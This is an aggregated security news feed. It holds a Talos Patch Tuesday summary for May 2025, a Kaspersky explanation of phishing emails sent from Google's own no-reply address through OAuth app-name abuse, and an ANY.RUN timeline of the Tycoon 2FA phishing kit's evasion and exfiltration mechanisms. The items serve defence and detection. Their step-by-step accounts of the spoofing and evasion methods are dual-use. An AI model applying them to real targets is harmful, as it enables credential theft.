Kaspersky official blog – ​Read More

Microsoft Patch Tuesday for May 2025 — Snort rules and prominent vulnerabilities

Microsoft Patch Tuesday for May 2025 — Snort rules and prominent vulnerabilities

Microsoft has released its monthly security update for May of 2025 which includes 78 vulnerabilities affecting a range of products, including 11 that Microsoft marked as “critical”.  

Microsoft noted five vulnerabilities that have been observed to be exploited in the wild. CVE-2025-30397 is a remote code execution vulnerability in the Microsoft Scripting Engine. There were also four elevation of privilege vulnerabilities being actively exploited, CVE-2025-32709, CVE-2025-30400, CVE-2025-32701 and CVE-2025-32706 affecting the Ancillary Function Driver for WinSock, the DWM Core Library and the Windows Common Log File System Driver.  

The eleven “critical” entries consist of five remote code execution (RCE) vulnerabilities, four elevation of privilege vulnerabilities, one information disclosure vulnerability and one spoofing vulnerability. Three of the critical vulnerabilities have been marked as “Exploitation more likely”: CVE-2025-30386 –a Microsoft Office RCE vulnerability, CVE-2025-30390 –an Azure ML Compute elevation of privilege vulnerability, and CVE-2025-30398 – a Nuance PowerScribe 360 information disclosure vulnerability.  

The most notable of the “critical” vulnerabilities listed affect Microsoft Office. CVE-2025-30386 is a RCE vulnerability with base CVSS 3.1 score of 8.3. To successfully exploit CVE-2025-30386, an attacker could send a victim an email, and without the victim clicking the link, viewing or interacting with the email, trigger a use-after-free scenario, allowing arbitrary code to be executed. Microsoft has assessed that the attack complexity is “Low”, and exploitation is “More likely”. Another RCE vulnerability affecting Microsoft Office, CVE-2025-30377, has a CVSS 3.1 base score of 8.4, and has been assessed an attack complexity of “Low”, but exploitation is considered “Less Likely”. 

Two RCE vulnerabilities affect the Remote Desktop Client. CVE-2025-29966 and CVE-2025-29967 are both Heap-cased Buffer Overflow vulnerabilities with CVSS 3.1 base scores of 8.8 with “Low” attack complexity and exploitation “Less Likely”. An attacker controlling a Remote Desktop Server could trigger the buffer overflow in a vulnerable when a vulnerable Remote Desktop Client connects to the server. 

CVE-2025-29833 is a RCE affecting the Virtual Machine Bus. This is a Time-of-check Time-of-use (TOCTOU) Race Condition which has been assessed an attack complexity of “High” and exploitation is “Less Likely”. 

Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that exploitation is “More likely”: 

  • CVE-2025-24063 – Kernel Streaming Service Driver Elevation of Privilege Vulnerability 
  • CVE-2025-29841 – Universal Print Management Service Elevation of Privilege Vulnerability 
  • CVE-2025-29971 – Web Threat Defense (WTD.sys) Denial of Service Vulnerability 
  • CVE-2025-29976 – Microsoft SharePoint Server Elevation of Privilege Vulnerability 
  • CVE-2025-30382 – Microsoft SharePoint Server Remote Code Execution Vulnerability 
  • CVE-2025-30385 – Windows Common Log File System Driver Elevation of Privilege Vulnerability 
  • CVE-2025-30388 – Windows Graphics Component Remote Code Execution Vulnerability

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64848-64867. There are also these Snort 3 rules: 64852-64853, 301192-301200, and 301203 

Cisco Talos Blog – ​Read More

How phishing emails are sent from no-reply@accounts.google.com | Kaspersky official blog

Imagine receiving an email that says Google has received a subpoena to release the contents of your account. The email looks perfectly “Googley”, and the sender’s address appears legitimate too: no-reply@accounts.google.com. A little unnerving (or maybe panic-inducing?) to say the least, right?

And what luck — the email contains a link to a Google support page that has all the details about what’s happening. The domain name in the link looks legit, too, and seems to belong to Google…

Regular readers of our blog have probably already guessed that we’re talking here about a new phishing scheme. And they’d be right. This time, the scammers are exploiting several genuine Google services to fool their victims and make the emails look as convincing as possible. Here’s how it works…

How phishing email mimics an official Google notification

The screenshot below shows the email that kicks off the attack; and it does a really credible job of pretending to be an alert from Google’s security system. The message informs the user that the company has received a subpoena requesting access to the data in their Google account.

The “from” field contains a genuine Google address: no-reply@accounts.google.com. This is the exact same address Google’s security notifications come from. The email also contains a few details that reinforce the illusion of authenticity: a Google Account ID, a support ticket number, and a link to the case. And, most importantly, the email tells the recipient that if they want to learn more about the case materials or contest the subpoena, they can do so by clicking a link.

The link itself looks quite plausible, too. The address includes the official Google domain and the support ticket number mentioned above. And it takes a savvy user to spot the catch: Google support pages are located at support.google.com, but this link leads to sites.google.com instead. The scammers are, of course, counting on users who either don’t understand such technicalities or don’t notice the word substitution.

If the user isn’t logged in, clicking the link takes them to a genuine Google account login page. After authorizing, they land on a page at sites.google.com, which quite convincingly mimics the official Google support site.

Fake Google Support page created with Google Sites

This is what a fake Google Support page linked in the email looks like. Source

Now, it just so happens that the sites.google.com domain belongs to the legitimate Google Sites service. Launched back in 2008, it’s a fairly unsophisticated website builder — nothing out of the ordinary. The important nuance about Google Sites is that all websites created within the platform are automatically hosted on a google.com subdomain: sites.google.com.

Attackers can use such an address to both lull victims’ vigilance and circumvent various security systems, as both users and security solutions tend to trust the Google domain. It’s little wonder that scammers have increasingly been using Google Sites to create phishing pages.

Spotting fakes: the devil’s in the (email) details

We’ve already described the first sign of a dodgy email: the address of the fake support page located at sites.google.com. Look to the email header for more red flags:

Phishing disguised as an official Google email: note the "to" and "mailed-by" fields

Spot the fake: look at the “to” and “mailed-by” fields in the header. Source

The fields to pay attention to are “from“, “to“, and “mailed-by“. The “from” one seems fine: the sender is the official Google email, no-reply@accounts.google.com.

But lo and behold, the “to” field just below it reveals the actual recipient address, and this one sure looks phishy: me[@]googl-mail-smtp-out-198-142-125-38-prod[.]net. The address is trying hard to imitate some technical Google address, but the typo in the company domain name is a dead giveaway. Moreover, it has absolutely no business being there — this field is supposed to contain the recipient’s email.

As we keep examining the header, another suspicious address pops up in the “mailed-by” field. Now, this one is clearly nowhere near Google territory: fwd-04-1.fwd.privateemail[.]com. Yet again, nonsense like this has no place in an authentic email. For reference, here’s what these fields look like in a real Google security alert:

Genuine Google security alert

The “to” and “mailed-by” fields in a genuine Google security alert

Unsurprisingly, these subtle signs would likely be lost on the average user — especially when they’re already freaked out by the looming legal trouble. Adding to the confusion is the fact that the fake email is actually signed by Google: the “signed-by” field shows accounts.google.com. In the next part of this post, we explain how the criminals managed to achieve this, and then we’ll talk about how to avoid becoming a victim.

Reconstructing the attack step by step

To figure out exactly how the scammers managed to send such an email and what they were after, cybersecurity researchers reenacted the attack. Their investigation revealed that the attackers used Namecheap to register the (now-revoked) googl-mail-smtp-out-198-142-125-38-prod[.]net domain.

Next, they used the same service again to set up a free email account on this domain: me[@]googl-mail-smtp-out-198-142-125-38-prod[.]net. In addition, the criminals registered a free trial version of Google Workspace on the same domain. After that the scammers registered their own web application in the Google OAuth system, and granted it access to their Google Workspace account.

Google OAuth is a technology that allows third-party web applications to use Google account data to authenticate users with their permission. You’ve likely encountered Google OAuth as a way to authenticate for third-party services: it’s the system you use every time you click a “Sign in with Google” button. Besides that, applications can use Google OAuth to obtain permission to, for example, save files to your Google Drive.

But let’s get back to our scammers. After a Google OAuth application is registered, the service allows sending a notification to the email address associated with the verified domain. Interestingly enough, the administrator of the web application is free to manually enter any text as the “App name” — which seems to be what the criminals exploited.

In the screenshot below, researchers demonstrate this by registering an app with the name “Any Phishing Email Text Inject Here with phishing URLs…”.

Google OAuth allows setting a completely arbitrary web app name, and scammers are taking advantage of this

Registering a web app with an arbitrary name in Google OAuth: the text of a scam email with a phishing link can be entered as a name. Source

Google then sends a security alert containing this phishing text from its official address. This email goes to the scammers’ email address on the domain registered through Namecheap. This service allows forwarding the received notification from Google to any addresses. All they need do is set a specific forwarding rule and specify the email addresses of potential victims.

How scammers set up a forwarding rule to deliver a phishing email that appears like it's coming from Google

Setting up a forwarding rule that allows sending the fake email to multiple recipients. Source

How to protect yourself from phishing attacks like this one

It’s not entirely clear what the attackers were hoping to achieve with this phishing campaign. Using Google OAuth to authenticate doesn’t mean the victim’s Google account credentials are shared with the scammers. The process generates a token that only provides limited access to the user’s account data — depending on the permissions the user authorized and the settings configured by the scammers.

The fake Google Support page the deceived user lands on suggested that the goal was to convince them to download some “legal documents” supposedly related to their case. The nature of these documents is unknown, but chances are they contained malicious code.

The researchers reported this phishing campaign to Google. The company acknowledged this as a potential risk for users and is currently working on a fix for the OAuth vulnerability. However, how long it will take to resolve the issue remains unknown.

In the meantime, here’s some advice to help you avoid becoming a victim of this and other intricate phishing schemes.

  • Stay calm if you get an email like this. Begin by carefully examining all the email header fields and comparing them to legitimate emails from Google — you likely have some in your inbox. If you see any discrepancies, don’t hesitate to hit “Delete”.
  • Be wary of websites on the google.com domain that are created with Google Sites. Lately, scammers have been increasingly exploiting it for a wide range of phishing schemes.
  • As a general rule, avoid clicking links in emails.
  • Use a robust security solution that will provide timely warnings about danger and block phishing links.

Follow the links below to read about five more examples of out-of-the-ordinary phishing.

Kaspersky official blog – ​Read More

Evolution of Tycoon 2FA Defense Evasion Mechanisms: Analysis and Timeline

Attackers keep improving ways to avoid being caught, making it harder to detect and investigate their attacks. The Tycoon 2FA phishing kit is a clear example, as its creators regularly add new tricks to bypass detection systems. 

In this study, we’ll take a closer look at how Tycoon 2FA’s anti-detection methods have changed over the past several months and suggest ways to spot them effectively. 

This article will discuss: 

  • A review of old and new anti-detection techniques. 
  • How the new tricks compared to the old ones. 
  • Tips for spotting these early. 

Knowing how attackers dodge detection and keeping user detection rules up to date are key to fighting these anti-detection methods. 

What is Tycoon 2FA 

Tycoon 2FA is a modern Phishing-as-a-Service (PhaaS) platform designed to bypass two-factor authentication (2FA) for Microsoft 365 and Gmail. It was first identified by Sekoia analysts in October 2023, though the Saad Tycoon group, which promotes this tool through private Telegram channels, has been active since August 2023. 

Tycoon 2FA uses an Adversary-in-the-Middle (AiTM) approach, where attackers set up a phishing page through a reverse proxy server. After a user enters their credentials and completes the 2FA process, the server captures session cookies, allowing attackers to reuse the session and bypass security measures. 

Currently, Tycoon 2FA is highly popular and widely used by cybercriminals, including the Saad Tycoon group. The platform offers ready-made phishing pages and an easy-to-use admin panel, making it accessible even to less technically skilled attackers. 

Discover the latest examples of Tycoon 2FA attacks using this search query in ANY.RUN’s Threat Intelligence Lookup:

threatName:”Tycoon” 

In 2024, an updated version of Tycoon 2FA was released, featuring enhanced evasion techniques, including dynamic code generation, obfuscation, and traffic filtering to block bots. Phishing emails are now frequently sent from legitimate, potentially compromised email addresses. 

The evolution of this phishing kit continues, with ANY.RUN researchers noting regular updates and new evasion mechanisms in its malicious software. This article aims to investigate and provide technical details on how Tycoon 2FA has evolved, is evolving, and may continue to evolve. 

Before We Begin

Tune in to ANY.RUN’s live webinar on Wednesday, May 14 | 3:00 PM GMT. We welcome heads of SOC teams, managers, and security specialists of different tiers who want to: 

  • Solve common security issues
  • Optimize their work processes 
  • Find out how to save company’s resources 

Analysis of a Tycoon2FA Attack from 01.10.2024 

Let’s begin the analysis with a typical Tycoon2FA attack observed October of 2024. The attack begins with a malicious URL and employs multiple evasion techniques to avoid detection. Below, we well break down each stage of the attack, highlighting its protective mechanisms and their purposes. 

View sandbox session 

Stage 1: Initial Attack Mechanisms 

The attack starts with a request to the following URL: 

hxxps://stellarnetwork[.]sucileton[.]com/EQn1RAKa/ 

Evasion Mechanism #1: Basic Code Obfuscation 

The page’s source code is obfuscated, making it difficult for automated systems or analysts to interpret its functionality.  

Figure 1: Evasion Mechanisms in Stage 1 of Tycoon 2FA

This is a foundational defense to hinder initial analysis. 

Speed up and simplify detection of malware and phishing threats like Tycoon2FA
with proactive analysis in ANY.RUN’s Interactive Sandbox 



Sign up with business email


Evasion Mechanism #2: “Nomatch” Check 

The code compares the URL (part of the attacker’s infrastructure) against a “nomatch” value. This check appears to be a decoy or placeholder, as the comparison always returns False. It may serve as a flag for services like Cloudflare. 

Figure 2: “Nomatch” Evasion Mechanism 

Evasion Mechanism #3: Domain Comparison 

The code verifies whether the current page’s domain matches the attacker’s designated infrastructure domain. If the domains match, the attack proceeds to load Stage 2 (the malicious payload) into the Document Object Model (DOM). If not, a fake error page is displayed. 

Figure 3: Domain Comparison Evasion Mechanism

Evasion Mechanism #4: Redirect to Fake Litespeed 404 Page on Failed Checks 

If the domain check fails, the user is redirected to a fake “Litespeed 404” error page.  

Figure 4: Fake 404 Page Redirect 

The page is designed to appear legitimate and deter further investigation. 

Figure 5: Example of Fake Litespeed 404 Page 

Purpose of Stage 1 Evasion Mechanisms 

Figure 6: Flowchart of Stage 1 Protective Checks in Tycoon 2FA 

These mechanisms are designed to prevent the malicious code from executing or revealing its behavior in isolated scenarios, such as: 

  • Malware analysis sandboxes. 
  • Offline inspection of saved HTML files. 

By ensuring the code only runs in the attacker’s controlled environment, these checks reduce the likelihood of detection. 

If all Stage 1 checks are passed, the malicious payload (Stage 2) is injected into the page’s DOM, advancing the attack to its next phase. 

Stage 2: Main Evasion Mechanisms 

Evasion Mechanism #5: Cloudflare Turnstile CAPTCHA  

Before loading the main content, Tycoon 2FA requires users to pass a Cloudflare Turnstile CAPTCHA. This protects the malicious page from web crawlers, Safebrowsing services, or automated systems that could capture and analyze the page’s content. 

Figure 7: Cloudflare CAPTCHA in Tycoon 2FA 

Evasion Mechanism #6: Debugger Timing Check 

During Stage 2, the code also measures the time taken to launch a debugger, a technique used to detect whether the page is running in a real browser or a sandboxed environment. In this sample, the check is rudimentary, and the timing result is not actively used, suggesting it may be a placeholder or incomplete feature. 

Figure 8: Debugger Timing Check Mechanism 

Evasion Mechanism #7: C2 Server Queries 

Tycoon 2FA sends a series of requests to the attacker’s Command-and-Control (C2) servers to determine whether to proceed to Stage 3. This process involves two steps: 

  • GET Request to Secondary C2 Domain
    A GET request is sent to another C2 domain, expecting a single-byte response: ‘0’ or ‘1’.  
    • If ‘1’ is received, the attack halts, and the user is redirected to a legitimate page.  
    • If ‘0’ is received, the attack continues. 
Figure 10: Code Fragment for Stage 3 Validation Checks 

If all Stage 2 checks are successfully passed, the page reloads, and the Stage 3 payload, the core malicious component, is retrieved and executed. 

Stage 3: Payload Unpacking 

Evasion Mechanism #8: Base64 + XOR Obfuscation 

The payload in Stage 3 is obfuscated using a combination of Base64 encoding and XOR encryption with a predefined key. This protects the malicious code from being easily analyzed or detected. 

Figure 11: Code for XOR-Base64 Deobfuscation

After deobfuscation (use this CyberChef recipe), the next stage is revealed, advancing the attack. 

Stage 4: Dynamic Payload Retrieval 

During the payload retrieval, a POST request is sent to the attacker’s C2 server. The request body contains data derived from the initial phishing URL, with logic that varies based on whether the victim’s email is included in the URL. 

Figure 12: Code for Sending POST Request 

Evasion Mechanism #9: Encrypted Payload Delivery

The C2 server responds with a JSON file containing ciphertext and decryption parameters. The specific data received depends on the contents of the POST request. The payload is decrypted to reveal the URL for the next stage. 

Figure 13: Code for Decrypting POST Request Response

To see the sample of the retrieved payload and its decryption, visit JSFiddle. The result of this action is the URL for Stage 5. 

Stage 5: Fake Login Page Delivery 

The content in Stage 5 is mostly unobfuscated, presenting a fake Microsoft Outlook login page designed to deceive the victim. It includes SVG assets and a stylesheet to mimic the legitimate interface. 

Figure 14: Loading of Fake MS Outlook Login Page

At the end of the page’s source code, an additional JavaScript script reuses the Base64 + XOR obfuscation technique (previously seen in Stage 3) to hide further malicious code. 

Figure 15: Base64/XOR Obfuscation in Stage 5

Deobfuscating this script reveals the next stage of the attack. 

Stage 6: Fake Authorization and Data Exfiltration 

The frontend mimics a Microsoft Outlook login page, designed to trick victims into entering their credentials. 

Figure 16: Loaded Fake MS Outlook Login Page 

At the end of the source code, a JavaScript script implements several new protective and operational mechanisms: 

Evasion Mechanism #10: Browser Detection 

The script identifies the victim’s browser to tailor the attack or detect analysis environments (e.g., sandboxes).  

Figure 17: Code for Browser Detection 

Evasion Mechanism #11: Clipboard Manipulation 

The script replaces the clipboard contents with junk data to interfere with analysis or debugging attempts.  

Figure 18: Code for Clipboard Manipulation 

Evasion Mechanism #9 (Reused): Payload Encryption/Decryption 

The script encrypts and decrypts the payload using hardcoded keys and initialization vectors (IVs), protecting data sent to and received from the C2 server.  

Figure 19: Code for Payload Encryption/Decryption 

Evasion Mechanism #12: C2 Routing with Dynamic URLs 

A randomly generated URL for data exfiltration is created using the RandExp library, following a pattern determined by the Tycoon 2FA operation mode (e.g., checkmail, checkpass, twofaselected). This ensures varied C2 communication paths, complicating detection.  

Figure 20: Code for Generating Random Exfiltration URLs 

Evasion Mechanism #13: Redirect API Validation 

The script checks the validity of a redirect API, likely used by Tycoon 2FA operators to monitor client status or subscription activity. 

Figure 21: Code for Redirect API Validation

Finally, the stolen data (e.g., credentials) is exfiltrated to a third C2 domain in the attack chain. The response from the C2 server dictates the phishing page’s behavior, such as prompting for 2FA or updating the account status.  

Figure 22: Code for Data Exfiltration

A JSFiddle snippet demonstrates the encryption/decryption of sent/received data.  

At the end of Stage 6, there is a link to another script, which loads the next stage of the attack. 

Figure 23: Link to Next Tycoon 2FA Stage 

Stage 7: Phishing Framework Enhancements 

After deobfuscation, Stage 7 reveals additional functionality for the Phishing-as-a-Service (PhaaS) framework, defining critical operations for the phishing interface. 

The code includes logic for:  

  • Managing the user interface behavior.  
  • Handling transitions between frames.  
  • Rendering core page elements.  
  • Implementing a state machine for the phishing page.  
  • Validating user inputs (e.g., email, password, OTP). 
Figure 24: Code fragment for phishing page State Machine 

Execution Chain Summary 

The complete execution chain, combining all mechanisms from Stages 1–7, is visualized below: 

Detailed breakdown of Tycoon2FA’s attack

With a comprehensive understanding of Tycoon 2FA’s attack flow, we can now analyze newer samples and compare them to this baseline to identify changes or additions to its anti-detection mechanisms. 

New Tycoon2FA Evasion Mechanisms: Timeline 

As we’ve discussed, Tycoon 2FA is steadily evolving, with its developers rolling out more sophisticated anti-detection mechanisms.  

Let’s now examine the latest evasion methods that have emerged in attacks since October. 

Attack Detected on 6 December 2024  

This sample introduces new anti-detection mechanisms in Stage 2, enhancing the malicious payload’s ability to avoid analysis and debugging environments. The following mechanisms were observed: 

Evasion Mechanism #14: Debug Environment Detection 

The script checks if the page is loaded in a legitimate browser rather than a debugging environment, such as Selenium (WebDriver), PhantomJS, or Burp Suite. If a debugging runtime is detected, the attack stops, and the user is redirected to about:blank.   

Figure 25: Code for Detecting Debugging Runtime

Evasion Mechanism #15: Keystroke Interception 

The code intercepts keyboard shortcuts associated with opening browser developer tools or other debugging functions, preventing their default actions. This hinders manual analysis by users or researchers.  

Figure 26: Code for Keystroke Interception 

The intercepted shortcuts include:   

  • F12: Opens DevTools (Firefox).  
  • Ctrl + U: Displays page source code.  
  • Ctrl + Shift + I: Opens DevTools (Generic).  
  • Ctrl + Shift + C: Opens DevTools (Chrome).  
  • Ctrl + Shift + J: Opens browser console (Firefox).  
  • Ctrl + Shift + K: Duplicates current tab (Edge).  
  • Ctrl + H: Opens browser history (Generic).  
  • Meta + Alt + I: Opens insert menu (varies by browser).  
  • Meta + Alt + C: Copies selected text.  
  • Meta + U: Shows page source or accessibility menu. 

Evasion Mechanism #16: Context Menu Blocking 

The script disables the right-click context menu, preventing access to browser tools or page source inspection. 

Figure 27: Code for Disabling Context Menu 

Improved Evasion Mechanism #6: Debugger Timing Check

Building on the rudimentary version in earlier samples, this implementation fully measures the time taken to launch a debugger. If the timing is abnormally long (suggesting a sandbox environment), the script redirects to a legitimate page, halting execution. 

Figure 28: Enhanced Debugger Timing Check Implementation 

Attack Detected on 17 December 2024  

In another attack from December, the threat introduced a new capability to enhance the phishing page’s authenticity, making it more convincing to victims. 

Evasion Mechanism #17: Dynamic Multimedia via Legitimate CDN 
Specifically, the phishing page dynamically loads a logo and custom background tailored to the domain of the victim’s email address, increasing its visual credibility.  

Figure 29: Phishing page with custom background

The multimedia content is delivered through Microsoft’s legitimate AADCDN network, leveraging trusted infrastructure to evade detection and reduce suspicion. 

Figure 30: Use of AADCDN for loading custom logos/backgrounds 

Attack Detected on 3 April 2025 

This sample introduces multiple new evasion mechanisms across various stages, reflecting Tycoon 2FA’s continued evolution in obfuscation, redirection, and anti-analysis techniques. 

Stage 1: Enhanced Obfuscation 

Evasion Mechanism #18: Complex JavaScript Code 

The payload uses Base64 obfuscation for JavaScript keywords, and method calls (e.g., document.write()) are invoked via object property access, complicating static analysis.  

The next stage’s content involves URL-encoding/decoding, further obscuring the code.  

Figure 31: More sophisticated code in Stage 1

Stage 2: New Evasion Techniques 

When Stage 2 code is deobfuscated, we can observe new evasion methods. 

Evasion Mechanism #19: Invisible Obfuscation 

The code employs whitespace-based “invisible” obfuscation, using proxy object calls and getter methods to retrieve and execute code via eval(). This technique makes the code harder to read and analyze. 

Figure 32: Invisible obfuscation code #1 
Figure 33: Invisible obfuscation code #2 

The form sent during the transition from Stage 2 to Stage 3 is now created as a FormData object, replacing the previous HTML <form> element approach, reducing detectability. 

Figure 34: Old HTML form declaration 
Figure 35: New FormData declaration 

Evasion Mechanism #20: Custom Fake Page Redirect 

Unlike earlier samples that redirected to legitimate sites (e.g., eBay) upon failing checks, this revision redirects to a custom fake HTML page, enhancing deception and avoiding reliance on external domains. 

Figure 36: Example of custom fake page

Evasion Mechanism #21: Custom CAPTCHA 

A custom CAPTCHA replaces the previously used Cloudflare Turnstile, likely to complicate signature-based and behavioral analysis and mitigate potential issues with Cloudflare’s security services.  

Figure 37: Custom CAPTCHA Code Fragment 
Figure 37: Custom CAPTCHA 

Stage 5: Clipboard Protection 

Evasion Mechanism #22: Disabling Clipboard Copying 

In addition to filling the clipboard with junk data (as seen in earlier samples), this revision prevents copying from the login form’s input fields, further hindering analysis.  

Figure 38: Code for Disabling Clipboard Copying 

Stage 6: Enhanced Data Exfiltration 

Evasion Mechanism #23: Custom Binary Encoding 

Data exfiltration now uses binary encoding for payloads, adding an additional layer of obfuscation.  

Figure 39: Code for binary encoding of payload 

To see the payload example, we can use CyberChef. The result is decrypted data.  

The decryption key is IV: 1234567890123456 

Figure 40: Example of decrypted payload

Attack Detected on 14 April 2025 

This sample introduces a more complex method for launching the Stage 1 payload, leveraging redirect chains to obscure the attack’s entry point. 

Evasion Mechanism #24: Extended Redirect Chain  

Clicking the initial phishing link triggers a redirect to Google Ads, followed by another redirect to a malicious URL that uses the following format:  

hxxps://<domain>/?<2nd_domain>=<base64_payload> 

A script then extracts the Base64 payload from location.search(), decodes it, and constructs the URL for the Stage 1 payload.  

This extended redirect chain makes it harder to trace the attack’s origin. 

Figure 41: Code for calculating phishing page URL

Tycoon 2FA has become more sophisticated in initiating its malicious payload, employing a longer redirect chain to obscure the entry point of the attack.  

The process is as follows: 

Figure 42: New redirect chain to Stage 1

Additionally, in POST requests, the cf-turnstile-response field (previously used for Cloudflare validation) is now filled with a placeholder value (qweqwe), confirming Tycoon 2FA’s shift away from Cloudflare. 

Evasion Mechanism #25: Rotating CAPTCHAs 

This revised version replaces the previously used custom CAPTCHA with Google reCAPTCHA.  

Figure 43: Use of Google reCAPTCHA in Tycoon 2FA 

Historical data shows Tycoon 2FA has cycled through different CAPTCHAs, such as IconCaptcha (observed in a submission on April 7, 2025).  

Figure 44: Example of IconCaptcha in Tycoon 2FA  

The use of varying CAPTCHAs complicates signature-based detection. 

Attack Detected on 23 April 2025 

Around this period, Tycoon 2FA introduced a new anti-detection mechanism focused on browser fingerprinting to detect sandbox environments and bot activity. 

View sandbox session 

Evasion Mechanism #26: Browser Fingerprinting

After opening the phishing link, a page is loaded requesting image element and executing a Base64-encoded script in case of an error.  

Figure 45: Suspicious onerror handler in image element 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

Follow along a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



After decoding with CyberChef, the script reveals functionality for:  

  • Collecting browser environment details: screen parameters, browser/platform name, URL, host, protocol, console properties, and document body.  
Figure 46: Code for collecting execution environment data 
  • Gathering additional data: timezone, JavaScript runtime internals, iframe checks, and graphical interface properties.  
Figure 47: Code for collecting browser properties 
  • Collecting miscellaneous technical information. 

The collected data is formatted as JSON, inserted into an invisible form, and sent to the attacker’s server via a POST request.  

Figure 48: Invisible form for sending fingerprint data 
Figure 49: Example of sent fingerprint data

The server analyzes the fingerprint data and returns a response with a Location header, leading to one of two outcomes:  

  • Redirect to a Legitimate Page: If checks fail (e.g., sandbox detected), the user is redirected to a legitimate site like Emirates, Tesla, or SpaceX. 
Figure 50: Example of failed C2 check redirect 
  • Redirect to Stage 1 Payload: If checks pass, the user is directed to the Tycoon 2FA Stage 1 phishing page. 
Figure 51: Example of successful transition to phishing page 

This mechanism also allows the attacker to geographically restrict the operation of the malware, enabling Tycoon2FA to launch in certain regions while terminating the attack process in others. 

Attack Detected on 6 May 2025 

Evasion Mechanism #27: Obfuscation through Encryption 

In this sample, we can observe that the Tycoon2FA operator began using AES encryption for payload obfuscation, not just for uploading/downloading stolen and service data in the final stages of execution.

Figure 52: Code for obfuscation via encryption

In all other parts, the execution chain of the new samples remains similar to the original.  

All Tycoon2FA Evasion Mechanisms 

Description  Sample  Date Observed 
Basic Obfuscation  https://app.any.run/tasks/7a87388b-8e07-4944-8d65-1422f56d303f  1 October 2024 
Nomatch Check 
Current Page Location Check 
Redirect to Fake Litespeed 404 Page on Failed Checks 
Cloudflare Turnstile 
Debugger Timing Check 
C2 Server Authorization for Payload Execution 
Base64/XOR Obfuscation 
Encryption of C2 Control/Exfiltrated Data 
10  Victim Browser Detection 
11  Clipboard Content Manipulation 
12  C2 Request Routing 
13  Redirect API Validation 
14  Debug Environment Detection (Selenium, etc.)  https://app.any.run/tasks/57f31060-cc3e-4a65-9fa9-f460ede5f39c  6 December 2024 
15  Keystroke Interception 
16  Context Menu Blocking 
17  Use of Legitimate CDN for Corporate Logos/Backgrounds  https://app.any.run/tasks/9700f36a-d506-4e5e-8f96-cdddc83e37a0  17 December 2024 
18  Complex JavaScript Code  https://app.any.run/tasks/d40e75ba-e4e8-4b51-b4a5-6614c8be7891  03 April 2025 
19  Invisible (Hangul) Obfuscation 
20  Redirect to Custom Fake Page on Failed Checks 
21  Use of Custom CAPTCHA Instead of Cloudflare 
22  Disabling Clipboard Copying 
23  Binary Encoding for Exfiltrated Data 
24  Extended Redirect Chain Before Payload Execution  https://app.any.run/tasks/3bb9892b-4c3d-4c5e-a44d-d569cab8578e  7 April 2025 – 14 April 2025 
25  Use of Different CAPTCHAs (reCAPTCHA, IconCaptcha, etc.) 
26  Browser Fingerprinting  https://app.any.run/tasks/7c54c46d-285f-491c-ab50-6de1b7d3b376  23 April 2025 
27  Obfuscation via Encryption  https://app.any.run/tasks/c43d00a5-60d9-433a-8aee-d359eaadf0ab  6 May 2025 

Conclusion 

The operators and developers of the Tycoon 2FA Phishing-as-a-Service (PhaaS) framework continue to actively enhance their product, focusing on complicating analysis of the malicious software. 

Tycoon 2FA is adopting increasingly sophisticated anti-bot techniques, such as rotating CAPTCHAs (e.g., Google reCAPTCHA, IconCaptcha, custom CAPTCHAs) and browser fingerprinting, to protect its infrastructure from crawlers and Safebrowsing solutions. 

The analysis indicates that there are several different versions or types of Tycoon 2FA active at the same time. This is evident because the methods used to avoid detection vary across different samples and time periods. Some techniques show up, disappear, and come back later.  

Alongside the primary focus on Microsoft Outlook authentication phishing, variants targeting Google account authentication have been observed:  

https://app.any.run/browses/b9c0b778-df32-4073-a580-18d7fc330518

https://app.any.run/tasks/a487cada-21b9-48e2-a7f3-470e3eddab0d

Despite the addition of new evasion techniques, some methods lack sophistication and remain relatively easy to bypass: 

  • Obfuscation: Most obfuscation relies on public tools like obfuscate.io, which can be reversed using deobfuscate.io.  
  • Limited JavaScript Exploitation: Tycoon 2FA does not fully leverage advanced JavaScript runtime capabilities, such as prototype manipulation, reflection mechanisms, or other dynamic code restructuring techniques. 

In certain aspects, Tycoon 2FA’s evasion mechanisms seem quite amateur. For example, across all observed samples, C2 payloads and exfiltrated data are encrypted/decrypted using hardcoded keys and initialization vectors (1234567890123456 for both key and IV). Ideally, unique keys should be generated per session to enhance security. 

The core architecture of Tycoon 2FA remains unchanged, relying on three domains: 

  • Primary phishing domain: Hosts the phishing page.  
  • Controller domain: Authorizes or denies further execution based on protective checks.  
  • Exfiltration domain: Receives stolen data. 

Similarly, the execution chain of the framework has remained consistent, enabling detection through behavioral analysis despite the introduction of new evasion mechanisms. 

Recommendations for Detecting Tycoon 2FA 

Given the constant changes in the source code of Tycoon 2FA phishing pages, signature-based analysis is largely ineffective, and behavioral analysis is essential for reliable detection.  

Tycoon 2FA employs a “triangle” of Command-and-Control (C2) domains from a specific pool of top-level domains (TLDs), including .ru, .es, .su, .com, .net, and .org. It also consistently loads a predictable set of JavaScript libraries, CSS stylesheets, and other web content, which can be leveraged for detection: Libraries: 

Okta CSS: 

Misc hyperlinks/web-content: 

To detect Tycoon 2FA, security teams can implement a heuristic based on the following behavioral patterns observed in a single session: 

  • C2 Domain Triangle: Communication with a set of domains from the TLD pool (e.g., .ru, .es, .su, .com, .net, .org).    
  • Resource Loading: Retrieval of the specific JavaScript libraries, CSS stylesheets, or web content listed above.    
  • Session Redirect: A redirect to the official Microsoft authentication page at the end of the session. 

Then there is a high probability that the activity involves Tycoon 2FA phishing. 

The post Evolution of Tycoon 2FA Defense Evasion Mechanisms: Analysis and Timeline appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More